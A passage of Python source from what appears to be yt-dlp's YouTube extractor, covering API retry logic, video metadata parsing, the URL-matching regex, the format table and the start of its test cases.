video_id=item_id, query=query,
context=self._extract_context(ytcfg, default_client),
api_key=self._extract_api_key(ytcfg, default_client),
api_hostname=api_hostname, default_client=default_client,
note='%s%s' % (note, ' (retry #%d)' % count if count else ''))
except ExtractorError as e:
if isinstance(e.cause, network_exceptions):
if isinstance(e.cause, compat_HTTPError):
first_bytes = e.cause.read(512)
if not is_html(first_bytes):
yt_error = try_get(
self._parse_json(
self._webpage_read_content(e.cause, None, item_id, prefix=first_bytes) or '{}', item_id, fatal=False),
lambda x: x['error']['message'], compat_str)
if yt_error:
self._report_alerts([('ERROR', yt_error)], fatal=False)
# Downloading page may result in intermittent 5xx HTTP error
# Sometimes a 404 is also recieved. See: https://github.com/ytdl-org/youtube-dl/issues/28289
# We also want to catch all other network exceptions since errors in later pages can be troublesome
# See https://github.com/yt-dlp/yt-dlp/issues/507#issuecomment-880188210
if not isinstance(e.cause, compat_HTTPError) or e.cause.code not in (403, 429):
last_error = error_to_compat_str(e.cause or e.msg)
if count < retries:
continue
if fatal:
raise
else:
self.report_warning(error_to_compat_str(e))
return
else:
try:
self._extract_and_report_alerts(response, only_once=True)
except ExtractorError as e:
# YouTube servers may return errors we want to retry on in a 200 OK response
# See: https://github.com/yt-dlp/yt-dlp/issues/839
if 'unknown error' in e.msg.lower():
last_error = e.msg
continue
if fatal:
raise
self.report_warning(error_to_compat_str(e))
return
if not check_get_keys or dict_get(response, check_get_keys):
break
# Youtube sometimes sends incomplete data
# See: https://github.com/ytdl-org/youtube-dl/issues/28194
last_error = 'Incomplete data received'
if count >= retries:
if fatal:
raise ExtractorError(last_error)
else:
self.report_warning(last_error)
return
return response
@staticmethod
def is_music_url(url):
return re.match(r'https?://music\.youtube\.com/', url) is not None
def _extract_video(self, renderer):
video_id = renderer.get('videoId')
title = self._get_text(renderer, 'title')
description = self._get_text(renderer, 'descriptionSnippet')
duration = parse_duration(self._get_text(
renderer, 'lengthText', ('thumbnailOverlays', ..., 'thumbnailOverlayTimeStatusRenderer', 'text')))
if duration is None:
duration = parse_duration(self._search_regex(
r'(?i)(ago)(?!.*\1)\s+(?P<duration>[a-z0-9 ,]+?)(?:\s+[\d,]+\s+views)?(?:\s+-\s+play\s+short)?$',
traverse_obj(renderer, ('title', 'accessibility', 'accessibilityData', 'label'), default='', expected_type=str),
video_id, default=None, group='duration'))
view_count = self._get_count(renderer, 'viewCountText')
uploader = self._get_text(renderer, 'ownerText', 'shortBylineText')
channel_id = traverse_obj(
renderer, ('shortBylineText', 'runs', ..., 'navigationEndpoint', 'browseEndpoint', 'browseId'),
expected_type=str, get_all=False)
timestamp, time_text = self._extract_time_text(renderer, 'publishedTimeText')
scheduled_timestamp = str_to_int(traverse_obj(renderer, ('upcomingEventData', 'startTime'), get_all=False))
overlay_style = traverse_obj(
renderer, ('thumbnailOverlays', ..., 'thumbnailOverlayTimeStatusRenderer', 'style'),
get_all=False, expected_type=str)
badges = self._extract_badges(renderer)
thumbnails = self._extract_thumbnails(renderer, 'thumbnail')
navigation_url = urljoin('https://www.youtube.com/', traverse_obj(
renderer, ('navigationEndpoint', 'commandMetadata', 'webCommandMetadata', 'url'),
expected_type=str)) or ''
url = f'https://www.youtube.com/watch?v={video_id}'
if overlay_style == 'SHORTS' or '/shorts/' in navigation_url:
url = f'https://www.youtube.com/shorts/{video_id}'
return {
'_type': 'url',
'ie_key': YoutubeIE.ie_key(),
'id': video_id,
'url': url,
'title': title,
'description': description,
'duration': duration,
'view_count': view_count,
'uploader': uploader,
'channel_id': channel_id,
'thumbnails': thumbnails,
'upload_date': (strftime_or_none(timestamp, '%Y%m%d')
if self._configuration_arg('approximate_date', ie_key='youtubetab')
else None),
'live_status': ('is_upcoming' if scheduled_timestamp is not None
else 'was_live' if 'streamed' in time_text.lower()
else 'is_live' if overlay_style is not None and overlay_style == 'LIVE' or 'live now' in badges
else None),
'release_timestamp': scheduled_timestamp,
'availability': self._availability(needs_premium='premium' in badges, needs_subscription='members only' in badges)
}
class YoutubeIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube'
_VALID_URL = r"""(?x)^
(
(?:https?://|//) # http(s):// or protocol-independent URL
(?:(?:(?:(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie|kids)?\.com|
(?:www\.)?deturl\.com/www\.youtube\.com|
(?:www\.)?pwnyoutube\.com|
(?:www\.)?hooktube\.com|
(?:www\.)?yourepeat\.com|
tube\.majestyc\.net|
%(invidious)s|
youtube\.googleapis\.com)/ # the various hostnames, with wildcard subdomains
(?:.*?\#/)? # handle anchor (#/) redirect urls
(?: # the various things that can precede the ID:
(?:(?:v|embed|e|shorts)/(?!videoseries|live_stream)) # v/ or embed/ or e/ or shorts/
|(?: # or the v= param in all its forms
(?:(?:watch|movie)(?:_popup)?(?:\.php)?/?)? # preceding watch(_popup|.php) or nothing (like /?v=xxxx)
(?:\?|\#!?) # the params delimiter ? or # or #!
(?:.*?[&;])?? # any other preceding param (like /?s=tuff&v=xxxx or ?s=tuff&v=V36LpHqtcDY)
v=
)
))
|(?:
youtu\.be| # just youtu.be/xxxx
vid\.plus| # or vid.plus/xxxx
zwearz\.com/watch| # or zwearz.com/watch/xxxx
%(invidious)s
)/
|(?:www\.)?cleanvideosearch\.com/media/action/yt/watch\?videoId=
)
)? # all until now is optional -> you can pass the naked ID
(?P<id>[0-9A-Za-z_-]{11}) # here is it! the YouTube video ID
(?(1).+)? # if we found the ID, everything can follow
(?:\#|$)""" % {
'invidious': '|'.join(YoutubeBaseInfoExtractor._INVIDIOUS_SITES),
}
_PLAYER_INFO_RE = (
r'/s/player/(?P<id>[a-zA-Z0-9_-]{8,})/player',
r'/(?P<id>[a-zA-Z0-9_-]{8,})/player(?:_ias\.vflset(?:/[a-zA-Z]{2,3}_[a-zA-Z]{2,3})?|-plasma-ias-(?:phone|tablet)-[a-z]{2}_[A-Z]{2}\.vflset)/base\.js$',
r'\b(?P<id>vfl[a-zA-Z0-9_-]+)\b.*?\.js$',
)
_formats = {
'5': {'ext': 'flv', 'width': 400, 'height': 240, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'6': {'ext': 'flv', 'width': 450, 'height': 270, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'13': {'ext': '3gp', 'acodec': 'aac', 'vcodec': 'mp4v'},
'17': {'ext': '3gp', 'width': 176, 'height': 144, 'acodec': 'aac', 'abr': 24, 'vcodec': 'mp4v'},
'18': {'ext': 'mp4', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 96, 'vcodec': 'h264'},
'22': {'ext': 'mp4', 'width': 1280, 'height': 720, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'34': {'ext': 'flv', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'35': {'ext': 'flv', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# itag 36 videos are either 320x180 (BaW_jenozKc) or 320x240 (__2ABJjxzNo), abr varies as well
'36': {'ext': '3gp', 'width': 320, 'acodec': 'aac', 'vcodec': 'mp4v'},
'37': {'ext': 'mp4', 'width': 1920, 'height': 1080, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'38': {'ext': 'mp4', 'width': 4096, 'height': 3072, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'43': {'ext': 'webm', 'width': 640, 'height': 360, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'44': {'ext': 'webm', 'width': 854, 'height': 480, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'45': {'ext': 'webm', 'width': 1280, 'height': 720, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'46': {'ext': 'webm', 'width': 1920, 'height': 1080, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'59': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'78': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# 3D videos
'82': {'ext': 'mp4', 'height': 360, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'83': {'ext': 'mp4', 'height': 480, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'84': {'ext': 'mp4', 'height': 720, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'85': {'ext': 'mp4', 'height': 1080, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'100': {'ext': 'webm', 'height': 360, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8', 'preference': -20},
'101': {'ext': 'webm', 'height': 480, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
'102': {'ext': 'webm', 'height': 720, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
# Apple HTTP Live Streaming
'91': {'ext': 'mp4', 'height': 144, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'92': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'93': {'ext': 'mp4', 'height': 360, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'94': {'ext': 'mp4', 'height': 480, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'95': {'ext': 'mp4', 'height': 720, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'96': {'ext': 'mp4', 'height': 1080, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'132': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'151': {'ext': 'mp4', 'height': 72, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 24, 'vcodec': 'h264', 'preference': -10},
# DASH mp4 video
'133': {'ext': 'mp4', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'h264'},
'134': {'ext': 'mp4', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'h264'},
'135': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'136': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264'},
'137': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264'},
'138': {'ext': 'mp4', 'format_note': 'DASH video', 'vcodec': 'h264'}, # Height can vary (https://github.com/ytdl-org/youtube-dl/issues/4559)
'160': {'ext': 'mp4', 'height': 144, 'format_note': 'DASH video', 'vcodec': 'h264'},
'212': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'264': {'ext': 'mp4', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'h264'},
'298': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'299': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'266': {'ext': 'mp4', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'h264'},
# Dash mp4 audio
'139': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 48, 'container': 'm4a_dash'},
'140': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 128, 'container': 'm4a_dash'},
'141': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 256, 'container': 'm4a_dash'},
'256': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'258': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'325': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'dtse', 'container': 'm4a_dash'},
'328': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'ec-3', 'container': 'm4a_dash'},
# Dash webm
'167': {'ext': 'webm', 'height': 360, 'width': 640, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'168': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'169': {'ext': 'webm', 'height': 720, 'width': 1280, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'170': {'ext': 'webm', 'height': 1080, 'width': 1920, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'218': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'219': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'278': {'ext': 'webm', 'height': 144, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp9'},
'242': {'ext': 'webm', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'243': {'ext': 'webm', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'244': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'245': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'246': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'247': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'248': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'271': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9'},
# itag 272 videos are either 3840x2160 (e.g. RtoitU2A-3E) or 7680x4320 (sLprVF6d7Ug)
'272': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'302': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'303': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'308': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'313': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'315': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
# Dash webm audio
'171': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 128},
'172': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 256},
# Dash webm audio with opus inside
'249': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 50},
'250': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 70},
'251': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 160},
# RTMP (unnamed)
'_rtmp': {'protocol': 'rtmp'},
# av01 video only formats sometimes served with "unknown" codecs
'394': {'ext': 'mp4', 'height': 144, 'format_note': 'DASH video', 'vcodec': 'av01.0.00M.08'},
'395': {'ext': 'mp4', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'av01.0.00M.08'},
'396': {'ext': 'mp4', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'av01.0.01M.08'},
'397': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'av01.0.04M.08'},
'398': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'av01.0.05M.08'},
'399': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'av01.0.08M.08'},
'400': {'ext': 'mp4', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'av01.0.12M.08'},
'401': {'ext': 'mp4', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'av01.0.12M.08'},
}
_SUBTITLE_FORMATS = ('json3', 'srv1', 'srv2', 'srv3', 'ttml', 'vtt')
_GEO_BYPASS = False
IE_NAME = 'youtube'
_TESTS = [
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&t=1s&end=9',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'channel': 'Philipp Hagemeister',
'channel_id': 'UCLqxVugv74EIW3VWh2NOa3Q',
'channel_url': r're:https?://(?:www\.)?youtube\.com/channel/UCLqxVugv74EIW3VWh2NOa3Q',
'upload_date': '20121002',
'description': 'md5:8fb536f4877b8a7455c2ec23794dbc22',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'view_count': int,
'like_count': int,
'availability': 'public',
'playable_in_embed': True,
'thumbnail': 'https://i.ytimg.com/vi/BaW_jenozKc/maxresdefault.jpg',
'live_status': 'not_live',
'age_limit': 0,
'start_time': 1,
'end_time': 9,
'channel_follower_count': int
}
},
{
'url': '//www.YouTube.com/watch?v=yZIXLfi8CZQ',
'note': 'Embed-only video (#1746)',
'info_dict': {
'id': 'yZIXLfi8CZQ',
'ext': 'mp4',
'upload_date': '20120608',
'title': 'Principal Sexually Assaults A Teacher - Episode 117 - 8th June 2012',
'description': 'md5:09b78bd971f1e3e289601dfba15ca4f7',
'uploader': 'SET India',
'uploader_id': 'setindia',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/setindia',
'age_limit': 18,
},
'skip': 'Private video',
},
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&v=yZIXLfi8CZQ',
'note': 'Use the first video ID in the URL',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'channel': 'Philipp Hagemeister',
'channel_id': 'UCLqxVugv74EIW3VWh2NOa3Q',
'channel_url': r're:https?://(?:www\.)?youtube\.com/channel/UCLqxVugv74EIW3VWh2NOa3Q',
'upload_date': '20121002',
'description': 'md5:8fb536f4877b8a7455c2ec23794dbc22',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'view_count': int,
'like_count': int,
'availability': 'public',
'playable_in_embed': True,
'thumbnail': 'https://i.ytimg.com/vi/BaW_jenozKc/maxresdefault.jpg',
'live_status': 'not_live',
'age_limit': 0,
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?v=a9LDPn-MO4I',
'note': '256k DASH audio (format 141) via DASH manifest',
'info_dict': {
'id': 'a9LDPn-MO4I',
'ext': 'm4a',
'upload_date': '20121002',
'uploader_id': '8KVIDEO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/8KVIDEO',
'description': '',
'uploader': '8KVIDEO',
'title': 'UHDTV TEST 8K VIDEO.mp4'
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141',
},
'skip': 'format 141 not served anymore',
},
# DASH manifest with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=IB3lcPjvWLA',
'info_dict': {
'id': 'IB3lcPjvWLA',
'ext': 'm4a',
'title': 'Afrojack, Spree Wilson - The Spark (Official Music Video) ft. Spree Wilson',
'description': 'md5:8f5e2b82460520b619ccac1f509d43bf',
'duration': 244,
'uploader': 'AfrojackVEVO',
'uploader_id': 'AfrojackVEVO',
'upload_date': '20131011',
'abr': 129.495,
'like_count': int,
'channel_id': 'UChuZAo1RKL85gev3Eal9_zg',
'playable_in_embed': True,
'channel_url': 'https://www.youtube.com/channel/UChuZAo1RKL85gev3Eal9_zg',
'view_count': int,
'track': 'The Spark',
'live_status': 'not_live',
'thumbnail': 'https://i.ytimg.com/vi_webp/IB3lcPjvWLA/maxresdefault.webp',
'channel': 'Afrojack',
'uploader_url': 'http://www.youtube.com/user/AfrojackVEVO',
'tags': 'count:19',
'availability': 'public',
'categories': ['Music'],
'age_limit': 0,
'alt_title': 'The Spark',
'channel_follower_count': int
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# Age-gate videos. See https://github.com/yt-dlp/yt-dlp/pull/575#issuecomment-888837000
{
'note': 'Embed allowed age-gate video',
'url': 'https://youtube.com/watch?v=HtVdAasjOgU',
'info_dict': {
'id': 'HtVdAasjOgU',
'ext': 'mp4',
'title': 'The Witcher 3: Wild Hunt - The Sword Of Destiny Trailer',
'description': r're:(?s).{100,}About the Game\n.*?The Witcher 3: Wild Hunt.{100,}',
'duration': 142,
'uploader': 'The Witcher',
'uploader_id': 'WitcherGame',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/WitcherGame',
'upload_date': '20140605',
'age_limit': 18,
'categories': ['Gaming'],
'thumbnail': 'https://i.ytimg.com/vi_webp/HtVdAasjOgU/maxresdefault.webp',
'availability': 'needs_auth',
'channel_url': 'https://www.youtube.com/channel/UCzybXLxv08IApdjdN0mJhEg',
'like_count': int,
'channel': 'The Witcher',
'live_status': 'not_live',
'tags': 'count:17',
'channel_id': 'UCzybXLxv08IApdjdN0mJhEg',
'playable_in_embed': True,
'view_count': int,
'channel_follower_count': int
},
},
{
'note': 'Age-gate video with embed allowed in public site',
'url': 'https://youtube.com/watch?v=HsUATh_Nc2U',
'info_dict': {
'id': 'HsUATh_Nc2U',
'ext': 'mp4',
'title': 'Godzilla 2 (Official Video)',
'description': 'md5:bf77e03fcae5529475e500129b05668a',
'upload_date': '20200408',
'uploader_id': 'FlyingKitty900',
'uploader': 'FlyingKitty',
'age_limit': 18,
'availability': 'needs_auth',
'channel_id': 'UCYQT13AtrJC0gsM1far_zJg',
'uploader_url': 'http://www.youtube.com/user/FlyingKitty900',
'channel': 'FlyingKitty',
'channel_url': 'https://www.youtube.com/channel/UCYQT13AtrJC0gsM1far_zJg',
'view_count': int,
'categories': ['Entertainment'],
'live_status': 'not_live',
'tags': ['Flyingkitty', 'godzilla 2'],
'thumbnail': 'https://i.ytimg.com/vi/HsUATh_Nc2U/maxresdefault.jpg',
'like_count': int,
'duration': 177,
'playable_in_embed': True,
'channel_follower_count': int
},
},
{
'note': 'Age-gate video embedable only with clientScreen=EMBED',
'url': 'https://youtube.com/watch?v=Tq92D6wQ1mg',
'info_dict': {
'id': 'Tq92D6wQ1mg',
'title': '[MMD] Adios - EVERGLOW [+Motion DL]',
'ext': 'mp4',
'upload_date': '20191228',
'uploader_id': 'UC1yoRdFoFJaCY-AGfD9W0wQ',
'uploader': 'Projekt Melody',
'description': 'md5:17eccca93a786d51bc67646756894066',
'age_limit': 18,
'like_count': int,
'availability': 'needs_auth',
'uploader_url': 'http://www.youtube.com/channel/UC1yoRdFoFJaCY-AGfD9W0wQ',
'channel_id': 'UC1yoRdFoFJaCY-AGfD9W0wQ',
'view_count': int,
'thumbnail': 'https://i.ytimg.com/vi_webp/Tq92D6wQ1mg/sddefault.webp',
'channel': 'Projekt Melody',
'live_status': 'not_live',
'tags': ['mmd', 'dance', 'mikumikudance', 'kpop', 'vtuber'],
'playable_in_embed': True,
'categories': ['Entertainment'],
'duration': 106,
'channel_url': 'https://www.youtube.com/channel/UC1yoRdFoFJaCY-AGfD9W0wQ',
'channel_follower_count': int
},
},
{
'note': 'Non-Agegated non-embeddable video',
'url': 'https://youtube.com/watch?v=MeJVWBSsPAY',
'info_dict': {
'id': 'MeJVWBSsPAY',
'ext': 'mp4',
'title': 'OOMPH! - Such Mich Find Mich (Lyrics)',
'uploader': 'Herr Lurik',
'uploader_id': 'st3in234',
'description': 'Fan Video. Music & Lyrics by OOMPH!.',
'upload_date': '20130730',
'track': 'Such mich find mich',
'age_limit': 0,
'tags': ['oomph', 'such mich find mich', 'lyrics', 'german industrial', 'musica industrial'],
'like_count': int,
'playable_in_embed': False,
'creator': 'OOMPH!',
'thumbnail': 'https://i.ytimg.com/vi/MeJVWBSsPAY/sddefault.jpg',
'view_count': int,
'alt_title': 'Such mich find mich',
'duration': 210,
'channel': 'Herr Lurik',
'channel_id': 'UCdR3RSDPqub28LjZx0v9-aA',
'categories': ['Music'],
'availability': 'public',
'uploader_url': 'http://www.youtube.com/user/st3in234',
'channel_url': 'https://www.youtube.com/channel/UCdR3RSDPqub28LjZx0v9-aA',
'live_status': 'not_live',
'artist': 'OOMPH!',
'channel_follower_count': int
},
},
{
'note': 'Non-bypassable age-gated video',
'url': 'https://youtube.com/watch?v=Cr381pDsSsA',
'only_matching': True,
},
# video_info is None (https://github.com/ytdl-org/youtube-dl/issues/4421)
# YouTube Red ad is not captured for creator
{
'url': '__2ABJjxzNo',
'info_dict': {
'id': '__2ABJjxzNo',
'ext': 'mp4',
'duration': 266,
'upload_date': '20100430',
'uploader_id': 'deadmau5',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/deadmau5',
'creator': 'deadmau5',
'description': 'md5:6cbcd3a92ce1bc676fc4d6ab4ace2336',
'uploader': 'deadmau5',
'title': 'Deadmau5 - Some Chords (HD)',
'alt_title': 'Some Chords',
'availability': 'public',
'tags': 'count:14',
'channel_id': 'UCYEK6xds6eo-3tr4xRdflmQ',
'view_count': int,
'live_status': 'not_live',
'channel': 'deadmau5',
'thumbnail': 'https://i.ytimg.com/vi_webp/__2ABJjxzNo/maxresdefault.webp',
'like_count': int,
'track': 'Some Chords',
'artist': 'deadmau5',
'playable_in_embed': True,
'age_limit': 0,
'channel_url': 'https://www.youtube.com/channel/UCYEK6xds6eo-3tr4xRdflmQ',
'categories': ['Music'],
'album': 'Some Chords',
'channel_follower_count': int
},
'expected_warnings': [
'DASH manifest missing',
]
},
# Olympics (https://github.com/ytdl-org/youtube-dl/issues/4431)
{
'url': 'lqQg6PlCWgI',
'info_dict': {
'id': 'lqQg6PlCWgI',
'ext': 'mp4',
'duration': 6085,
'upload_date': '20150827',
'uploader_id': 'olympic',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/olympic',
'description': 'HO09 - Women - GER-AUS - Hockey - 31 July 2012 - London 2012 Olympic Games',
'uploader': 'Olympics',
'title': 'Hockey - Women - GER-AUS - London 2012 Olympic Games',
'like_count': int,
'release_timestamp': 1343767800,
'playable_in_embed': True,
'categories': ['Sports'],
'release_date': '20120731',
'channel': 'Olympics',
'tags': ['Hockey', '2012-07-31', '31 July 2012', 'Riverbank Arena', 'Session', 'Olympics', 'Olympic Games', 'London 2012', '2012 Summer Olympics', 'Summer Games'],
'channel_id': 'UCTl3QQTvqHFjurroKxexy2Q',
'thumbnail': 'https://i.ytimg.com/vi/lqQg6PlCWgI/maxresdefault.jpg',
'age_limit': 0,
'availability': 'public',
'live_status': 'was_live',
'view_count': int,
'channel_url': 'https://www.youtube.com/channel/UCTl3QQTvqHFjurroKxexy2Q',
'channel_follower_count': int
},
'params': {
'skip_download': 'requires avconv',
}
},
# Non-square pixels
{
'url': 'https://www.youtube.com/watch?v=_b-2C3KPAM0',
'info_dict': {
'id': '_b-2C3KPAM0',
'ext': 'mp4',
'stretched_ratio': 16 / 9.,
'duration': 85,
'upload_date': '20110310',
'uploader_id': 'AllenMeow',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/AllenMeow',
'description': 'made by Wacom from Korea | 字幕&加油添醋 by TY\'s Allen | 感謝heylisa00cavey1001同學熱情提供梗及翻譯',
'uploader': '孫ᄋᄅ',
'title': '[A-made] 變態妍字幕版 太妍 我就是這樣的人',
'playable_in_embed': True,
'channel': '孫ᄋᄅ',
'age_limit': 0,
'tags': 'count:11',
'channel_url': 'https://www.youtube.com/channel/UCS-xxCmRaA6BFdmgDPA_BIw',
'channel_id': 'UCS-xxCmRaA6BFdmgDPA_BIw',
'thumbnail': 'https://i.ytimg.com/vi/_b-2C3KPAM0/maxresdefault.jpg',
'view_count': int,
'categories': ['People & Blogs'],
'like_count': int,
'live_status': 'not_live',
'availability': 'unlisted',
'channel_follower_count': int
},
},
# url_encoded_fmt_stream_map is empty string
{
'url': 'qEJwOuvDf7I',
'info_dict': {
'id': 'qEJwOuvDf7I',
'ext': 'webm',
'title': 'Обсуждение судебной практики по выборам 14 сентября 2014 года в Санкт-Петербурге',
'description': '',
'upload_date': '20150404',
'uploader_id': 'spbelect',
'uploader': 'Наблюдатели Петербурга',
},
'params': {
'skip_download': 'requires avconv',
},
'skip': 'This live event has ended.',
},
# Extraction from multiple DASH manifests (https://github.com/ytdl-org/youtube-dl/pull/6097)
{
'url': 'https://www.youtube.com/watch?v=FIl7x6_3R5Y',
'info_dict': {
'id': 'FIl7x6_3R5Y',
'ext': 'webm',
'title': 'md5:7b81415841e02ecd4313668cde88737a',
'description': 'md5:116377fd2963b81ec4ce64b542173306',
'duration': 220,
'upload_date': '20150625',
'uploader_id': 'dorappi2000',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/dorappi2000',
'uploader': 'dorappi2000',
'formats': 'mincount:31',
},
'skip': 'not actual anymore',
},
# DASH manifest with segment_list
{
'url': 'https://www.youtube.com/embed/CsmdDsKjzN8',
'md5': '8ce563a1d667b599d21064e982ab9e31',
'info_dict': {
'id': 'CsmdDsKjzN8',
'ext': 'mp4',
